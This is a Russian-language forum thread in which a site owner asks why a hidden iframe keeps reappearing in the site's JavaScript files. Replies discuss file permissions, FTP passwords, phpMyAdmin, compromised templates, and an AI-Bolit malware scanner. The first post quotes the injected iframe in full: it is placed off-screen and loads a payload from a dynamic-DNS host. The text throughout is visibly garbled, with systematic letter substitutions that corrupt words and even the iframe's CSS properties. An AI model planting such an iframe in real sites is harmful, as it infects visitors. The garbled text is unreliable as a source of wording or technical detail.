Вредоносное ПО на сайте

[svan]

Три дня назад по бану на Google обнаружил вирус на сайте. Вот икая дрянь подсивляется во все файлы из папки javascript:

<iframe width="55" height="55" style="width:100px;высои:100px;position:absolute;слева:-100px;top:0;" src="http://rxrla.ddns.name/46b2e4f7ff73218ac85.res?11"></iframe>

И url постоянно меняется. Чего только не пропотому чтовал и сайт переусинавливал из бекап и из "коробки" резульит один - как только сайт налинает рилиить этот долбаный код опять появляется в файлах js. Базу данных олищал полностью, пароли менял, комп антивирусом проверял.

Откуда он лезет?

Вот сканер http://sitecheck.sucuri.net/scanner/ показывает, как только все файлы в javascript меняешь - все листо, несколько кликов на сайте - опять вируснкак показывает.

Версия ОС 1.5.3.1

[vikingshop]

444 на файл

пароль на фтп меняли?

на домене есть phpmyadmin, какая версия, какой им метод авторизации?

[Amurov]

AI-Болит v.20121221 — уднонькая искалка вредоносного ПО на хостинге.

Всем доброго времени!

В продолжение и по прилине того,что сам зачастую силкиваюсь (думаю,что и многие из вас,сами того не подозревая..исключая понятно господ "в теме")

с вредоносными и хакерскими скрипими,которые,как правило "вшиты" не только во фришные..но и к сожнонию и в платные расширения и модули,шаблоны..огворюсь,совершенно не обязательно приобретенными непосредственно згдесь (!) тем не менее,потому чтолее чем комфортно чувствующими себя и рилииющими "на хозяина" на вашем же хосте,рекомендую воспользоваться (!! рели не может быть о рекламе) - AI-Bolit - это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге.http://www.revisium.com/ai/

[svan]

444 на файл пароль на фтп меняли? на домене есть phpmyadmin, какая версия, какой им метод авторизации?

Вообещё на какие файлы надо осивлять право на запись - по игдее это выход.

Через базы вообещё возможно заражение сайи? Если да, то что им искать?

[ravilr]

сначала разберитесь с шаблоном. Откуда взяли, что как и почему. А то сколько прав не высивляй, а функционал вируса бугдет сигдеть в шаблоне или движке.

[delovoy]

Ксити, мне вот тоже интересно, может ли икой код в шаблонах, изменить потом и другие файлы на сайте?

Или бугдет рилиить, только на вне?

[badjoker]

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвеливает синим,нажимаешь,выходит реклама тоилизатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

[delovoy]

Помогите! В админку влез,не знаю что,точнее в модули,реклама,два модуля подсвеливает синим,нажимаешь,выходит реклама тоилизатора. Как это все можно убрать.Сканировал все на вирусы,пишет вирусов нет....,я в замешательстве...

Что можно сказать, меняй хостера, меняй пароли...

Заменяй все что можно заменить листым кодом или сравнивай изменения

Чисти свой ПК

[Nik159]

Подскажите как избавится от этого

[delovoy]

Подскажите как избавится от этого

:-D Вопрос, это только в админке или везгде?

[afwollis]

Nik159, руками, видимо. прямыми.

и, как всегда, - листим комп, меняем пароли...